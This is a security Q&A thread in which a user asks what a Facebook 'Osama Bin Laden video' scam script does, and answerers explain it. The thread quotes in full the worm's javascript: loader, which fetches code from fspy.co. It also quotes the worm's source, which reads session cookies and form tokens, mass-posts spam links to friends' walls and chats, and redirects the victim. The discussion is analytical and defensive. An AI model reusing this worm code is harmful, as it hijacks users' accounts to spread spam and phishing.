# Facebook spam / phishing attempt?

Tags: attacks, javascript

I got this sent by a friend on Facebook and I don't think its a genuine message:

```
___ shared a link on your Wall. 
This will leave you speechless) 
http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668 
Osama Bin Laden Death Video! 
Navy Seals raid Bin Ladens hideout and execute him!
```

There it gave a message to type the following in the address bar:

```
javascript:(a=(b=document).createElement('script')).src='//fspy.co/o.js?'+Math.random(),b.body.appendChild(a);void(0)
```

I checked this fspy.co/o.js file and its contents are as below.

I was trying to understand what this script does. Does anybody here have more insights?
    ///////////////////////////////////////////////////////////////////////////////////////////////////////////////
    // KuNG FU JS v.1  20yrsplus.info
    ///////////////////////////////////////////////////////////////////////////////////////////////////////////////

```
//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {

    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1,c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;

}

var user_id = readCookie("c_user");


// Setup some variables

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// Multiple URL Shorteners

var shortArray = new Array(
               "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?",
               "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?"
              );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat message variables

var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

    if(http1.readyState == 4 && http1.status == 200) { // If state = success

        var response1 = http1.responseText;

        response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
        response1 = JSON.parse(response1); // Convert the response to JSON

        //alert(response4.toSource());

        var count = 0;

        for(uid in response1.payload.entries){

            if(count < 400){

                //alert("SENT TO "+response1.payload.entries[count].uid);

                // Loop to send messages

                // New XMLHttp object
                var httpwp = new XMLHttpRequest();

                var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
                var randLink = new Array("http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?", "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?");
                var statusmessage="This will leave you speechless";
                var title="Osama Bin Laden Death Video!";
//              var link="http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
                var link = randLink[Math.floor(randLink.length*Math.random())];
                var description="Navy Seals raid Bin Ladens hideout and execute him! ";
                var picture="http://cooldadssz.co.cc/laden.png";

                var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";

                httpwp.open("POST", urlwp, true);

                //Send the proper header information along with the request

                httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                httpwp.setRequestHeader("Content-length", paramswp.length);
                httpwp.setRequestHeader("Connection", "keep-alive");                    

                httpwp.onreadystatechange = function() { //Call a function when the state changes.
                    if(httpwp.readyState == 4 && httpwp.status == 200){
                        //alert(http.responseText);
                        //alert('buddy list fetched');
                    }

                }

                httpwp.send(paramswp);

            }

            count++; // increment counter

        }

        http1.close; // Close the connection



    }

}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
    if(http3.readyState == 4 && http3.status == 200) {

        var response3 = http3.responseText;

        response3 = response3.replace("for (;;);", "");
        response3 = JSON.parse(response3);

        var count = 0;

        for(property in response3.payload.buddy_list.nowAvailableList){

            if(count < 100){

                // Loop to send messages

                // New XMLHttp object
                var httpc = new XMLHttpRequest();

                // Generate random message ID

                var msgid = Math.floor(Math.random()*1000000);

                var time = Math.round(new Date().getTime() / 1000);

                var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
                var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
                httpc.open("POST", urlc, true);

                //Send the proper header information along with the request
                httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                httpc.setRequestHeader("Content-length", paramsc.length);
                httpc.setRequestHeader("Connection", "close");

                httpc.onreadystatechange = function() { //Call a function when the state changes.
                    if(httpc.readyState == 4 && httpc.status == 200){
                        //alert(http.responseText);
                        //alert('buddy list fetched');
                    }
                }
                httpc.send(paramsc);

            }

            //alert(property);
            count++; // increment counter

        }

        http3.close; // Close the connection

    }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {

        http4.close; // Close the connection

    }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
    if(http5.readyState == 4 && http5.status == 200) {

        http5.close; // Close the connection

    }
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none";
document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";
var endArray = new Array("http://fspy.co/", "http://fspy.co/", "http://fspy.co/", "http://fspy.co/");


var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://fbview.net/osama.html';", 15000);
```

Comment: why the negative vote? because i'm trying to understand some piece ofmalicious code? what's wrong with that?

Comment: guessing the negative vote is because as @Rook said, the code is commented so well you can just read the English to see what it does:-)

Comment: The downvoter may have been more concerned with actually including the exploit code here.  As for reading code/comments, I think a goal of our site is to bridge the gap between implementors and security-minded folks, and there are important aspects to what this does and how to defend against it that are of course nonobvious.  Editing the question to leave out the code and ask for defensive info would help.

Answer (score 5):

That code is well commented,  in fact it has too many comments:

> count++; // increment counter

All of its major features are listed and its painfully simple code.    It behaves a lot like the [Samy worm](http://namb.la/popular/tech.html),  but instead of xss it uses social engineering.

Comment: Thanks @rook - could you help me understand what its doing

Comment: @Frank D Have you ever written a line of code?

Comment: I certainly wouldn't expect all users here to be programmers.  A goal of our site is to bridge the gap between implementors and security-minded folks.

Answer (score 2):

From what I understand, the most important parts is that it retrieves your facebook cookie **user_id** , opens a chat box with your online friends, registers you with a FB group, and stuff like that. If you start writing this code yourself into a different context, step by step, you can see what the http connections are doing.

Some of the parts like variables in the code **paramsc** might not make sense because they have a form which are specific to facebook. To understand these variables, do things like 'join a group' in  FB, see the header in the browser, and then copy it, and replace parts that you want. It is not that difficult. It could be made more secure definetely. They could be doing quite a few things to avoid this, but I guess they were not prepared for this. There is a sudden flood of these links people are pressing.

It is difficult to fight it seems because groups want to send links to friends to join them, and not have these links change over time, and for them to be done with a simple click. Also they must work by simply putting them into an email and with a click, you're in, and with an active cookie nothing else is needed. So there are trade offs. I wonder what they will do. I bet FB is losing sleep over this right now.

Answer (score 0):

Bit more discussion over on SO - [Preventing the Osama Facebook Worm](https://stackoverflow.com/q/5886899/529337)

This one should be so simple to prevent - it relies on a user actually copy and pasting in a command they don't understand.

The downside is - "enough people are stupid enough" so it spreads.

So from the title of your question - yes it is blatantly an attack

And I think @Vass explained sufficient workings